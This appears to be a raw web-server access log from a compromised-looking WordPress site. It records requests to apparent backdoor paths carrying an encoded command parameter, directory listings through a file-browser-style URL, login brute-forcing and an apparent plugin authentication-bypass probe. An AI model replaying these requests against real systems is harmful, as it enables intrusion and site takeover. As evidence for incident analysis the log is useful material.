142.4.205.1 - - [16/Oct/2025:11:08:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303838342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373238342q3338613630333934653032356131376664313261666166393465363738666235222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:08:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303930342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373330342q3038613233633064306433663461343533316432393133326265396138303037222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
217.182.195.126 - - [16/Oct/2025:11:09:28 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/bad_gateway.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7087 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:31 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/bad_request.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7096 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:33 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/forbidden.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7059 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:35 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/maintenance.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7120 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:37 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/method_not_allowed.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7077 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.208.156.186 - - [16/Oct/2025:11:09:37 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 10462 "127.0.0.1" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
217.182.195.126 - - [16/Oct/2025:11:09:38 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_acceptable.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7081 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.208.156.186 - - [16/Oct/2025:11:09:40 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0"
217.182.195.126 - - [16/Oct/2025:11:09:41 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_found.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7075 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:42 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_implemented.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7124 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
185.208.156.186 - - [16/Oct/2025:11:09:43 -0400] "GET /wp-admin/ HTTP/1.0" 200 10462 "127.0.0.1" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:08:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303932342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373332342q3133373962346664383033393632616362323631356235636364643137636432222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:11:09:44 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8) AppleWebKit/536.25 (KHTML, like Gecko) Version/6.0 Safari/536.25"
217.182.195.126 - - [16/Oct/2025:11:09:44 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/proxy_authentication_required.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:46 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 11318 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:48 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 7855 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:50 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/rbNiEwZzfMKL.ogm&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 8927 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:52 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/.channels HTTP/1.0" 200 7213 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:53 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/.registry HTTP/1.0" 200 7084 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:55 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/data HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:57 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/docs HTTP/1.0" 200 6733 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:09:59 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/ext HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:10:00 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php/tests HTTP/1.0" 200 6732 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:10:02 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 7209 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:09:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303934342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373334342q3465616439373238363061343961653764313732343134373530323532356565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
217.182.195.126 - - [16/Oct/2025:11:10:04 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/images/images/images HTTP/1.0" 200 7420 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
103.174.152.62 - - [16/Oct/2025:11:10:08 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.208.156.186 - - [16/Oct/2025:11:10:11 -0400] "GET /wp-content/plugins/stacks-mobile-app-builder/readme.txt HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36"
103.174.152.62 - - [16/Oct/2025:11:10:14 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.208.156.186 - - [16/Oct/2025:11:10:14 -0400] "GET /?mobile_co=1&uid=1 HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
69.197.179.242 - - [16/Oct/2025:11:09:15 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
185.208.156.186 - - [16/Oct/2025:11:10:17 -0400] "POST /wp-admin/index.php HTTP/1.0" 200 10462 "127.0.0.1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
142.4.205.1 - - [16/Oct/2025:11:09:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303936342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373336342q3166623138316630303963663564306535663737626634303437613864353530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:09:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633303938342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373338342q3739313531383036343864646462653366663032656165363635366635363566222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:11:10:55 -0400] "GET /?_g=618896 HTTP/1.0" 200 24210 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:10:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313030342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373430342q3731393366663162366638613632313366643338343635623334313233373365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:10:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313032342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373432342q3766313936366164333662396664326366313739656566363034373066333536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:10:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313034342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373434342q3631623033383266666462396264376631326338666361626636613831633234222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:11:11:02 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 504 4358 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:11:11:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313036342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373436342q3666623132346662393430336338353734613432353933313731313830633462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:11:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313038342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373438342q6530373532343564366365653165663735666137663065326538633637383665222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:11:44 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313130342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373530342q3964353038656136313831366536316532326663353239343533383531643862222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:12:04 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313132342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373532342q3261396436343764633463313138363265656461386366653030646136636665222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:11:13:04 -0400] "GET /?_g=647191 HTTP/1.0" 200 25118 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [16/Oct/2025:11:13:06 -0400] "GET /market/48896704.htm HTTP/1.0" 200 25111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.182.195.126 - - [16/Oct/2025:11:13:23 -0400] "GET /robots.txt HTTP/1.0" 200 4616 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [16/Oct/2025:11:12:24 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633313134342p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303632373534342q3836376639383564303863643730303234323530386634333738316338633135222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
217.182.195.126 - - [16/Oct/2025:11:13:24 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/bad_gateway.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7087 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:26 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/bad_request.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7096 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:28 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/forbidden.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7059 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/maintenance.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7120 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:31 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/method_not_allowed.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7077 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:33 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_acceptable.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7081 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:35 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_found.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7075 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:37 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/not_implemented.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7124 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:38 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/error_docs/proxy_authentication_required.html&path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7102 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:40 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 11318 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
217.182.195.126 - - [16/Oct/2025:11:13:42 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 7855 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
